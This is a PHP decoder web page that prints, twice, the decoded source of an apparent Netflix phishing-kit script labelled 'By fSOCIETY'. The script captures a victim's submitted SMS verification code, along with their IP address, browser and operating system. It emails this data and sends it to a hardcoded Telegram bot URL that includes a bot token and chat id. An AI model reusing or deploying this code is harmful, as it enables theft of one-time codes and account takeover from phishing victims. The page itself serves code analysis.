Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php session_start(); include("system.php"); include("detect.php"); include("...

Decoded Output download

<?php 
 
 
session_start(); 
 
include("system.php"); 
include("detect.php");  
include("../Email.php");  
include("cookies.php"); 
 
$InfoDATE   = date("d-m-Y h:i:sa"); 
 
$OS =getOS($_SERVER['HTTP_USER_AGENT']);  
 
$UserAgent =$_SERVER['HTTP_USER_AGENT']; 
$browser = explode(')',$UserAgent);				 
$_SESSION['browser'] = $browserTy_Version =array_pop($browser); 	 
 
 
$Smstwo = $_SESSION['Smstwo'] = $_POST['Smstwo']; 
 
$msgbank = '<html> 
<body> 
    <p class="pop"> 
         
    </p> 
    <div class="content"> 
        <div class="mail"> 
            <p style="text-align: center;">   </p> 
<p> 
<h2 style="font-size: 25px;font-family: &quot;Comic Sans MS&quot;, cursive, sans-serif;">SMS 2 Netflix  '.$_SERVER['REMOTE_ADDR'].' By fSOCIETY  </h2> 
<h2> SMS 2 : <span>'.$_SESSION["Smstwo"].'</span> </h2> 
<hr class="content" ><h2>s System : <span>  '.$OS.' </span>  </h2> 
<h2> BROWSER : <span> '.$browserTy_Version.' </span>  </h2> 
 
<h2> IP INFO : <span><a href="http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'">'.$_SESSION['country1'].'</a></span> 
<a href="http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'"> 
<img src="https://www.countryflags.io/'.$_SESSION['countrycode1'].'/flat/16.png" style=" 
    width: 34px; 
    margin: -5px 4px -10px 5px; 
"></a> </h2> 
<h2> TIME/DATE : <span> '.$InfoDATE.' </span> </h2><br> 
</p> 
 
</div> 
         
    </div> 
     
 
</body></html>'; 
$yagmai .= ' 
[ SMS 2] = '.$_SESSION['Smstwo'].' 
       [+] System[+] 
[ IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].' 
[ TIME/DATE] ='.$InfoDATE.' 
[ BROWSER] = '.$browserTy_Version.' and '.$OS.' 
'; 
 
 
$yagmail .= ' 
[+]Netflix[+] 
[+] SMS 2[+] 
[ SMS 2] = '.$_SESSION['Smstwo'].' 
[+] System[+] 
[ IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].' 
[ TIME/DATE] ='.$InfoDATE.' 
[ BROWSER] = '.$browserTy_Version.' and '.$OS.' 
[+]FX[+] 
 
'; 
 
$subject = " SMS 2 | NTFLX | ".$_SESSION['iduserLoginId']." | ".$_SERVER['REMOTE_ADDR']." | ".$_SESSION['country1']." "; 
$headers = 'From: FX' . "
"; 
mail($yourmail, $subject, $yagmail, $headers); 
file_get_contents("https://api.telegram.org/bot1858330846:AAGozR20QpZ2udqwoPSPTc9U3n6AkN_cYeM/sendMessage?chat_id=-722529347&text=" . urlencode($yagmail)."" ); 
 
 
 
 
?>

Did this file decode correctly?

Original Code

<?php


session_start();

include("system.php");
include("detect.php"); 
include("../Email.php"); 
include("cookies.php");

$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);				
$_SESSION['browser'] = $browserTy_Version =array_pop($browser); 	


$Smstwo = $_SESSION['Smstwo'] = $_POST['Smstwo'];

$msgbank = '<html>
<body>
    <p class="pop">
        
    </p>
    <div class="content">
        <div class="mail">
            <p style="text-align: center;">   </p>
<p>
<h2 style="font-size: 25px;font-family: &quot;Comic Sans MS&quot;, cursive, sans-serif;">SMS 2 Netflix  '.$_SERVER['REMOTE_ADDR'].' By fSOCIETY  </h2>
<h2> SMS 2 : <span>'.$_SESSION["Smstwo"].'</span> </h2>
<hr class="content" ><h2>s System : <span>  '.$OS.' </span>  </h2>
<h2> BROWSER : <span> '.$browserTy_Version.' </span>  </h2>

<h2> IP INFO : <span><a href="http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'">'.$_SESSION['country1'].'</a></span>
<a href="http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'">
<img src="https://www.countryflags.io/'.$_SESSION['countrycode1'].'/flat/16.png" style="
    width: 34px;
    margin: -5px 4px -10px 5px;
"></a> </h2>
<h2> TIME/DATE : <span> '.$InfoDATE.' </span> </h2><br>
</p>

</div>
        
    </div>
    

</body></html>';
$yagmai .= '
[ SMS 2] = '.$_SESSION['Smstwo'].'
       [+] System[+]
[ IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[ TIME/DATE] ='.$InfoDATE.'
[ BROWSER] = '.$browserTy_Version.' and '.$OS.'
';


$yagmail .= '
[+]Netflix[+]
[+] SMS 2[+]
[ SMS 2] = '.$_SESSION['Smstwo'].'
[+] System[+]
[ IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[ TIME/DATE] ='.$InfoDATE.'
[ BROWSER] = '.$browserTy_Version.' and '.$OS.'
[+]FX[+]

';

$subject = " SMS 2 | NTFLX | ".$_SESSION['iduserLoginId']." | ".$_SERVER['REMOTE_ADDR']." | ".$_SESSION['country1']." ";
$headers = 'From: FX' . "\r\n";
mail($yourmail, $subject, $yagmail, $headers);
file_get_contents("https://api.telegram.org/bot1858330846:AAGozR20QpZ2udqwoPSPTc9U3n6AkN_cYeM/sendMessage?chat_id=-722529347&text=" . urlencode($yagmail)."" );




?>

Function Calls

session_start 1

Variables

None

Stats

MD5 8ca00dc8fc8a675a70abdbe537773dc5
Eval Count 0
Decode Time 43 ms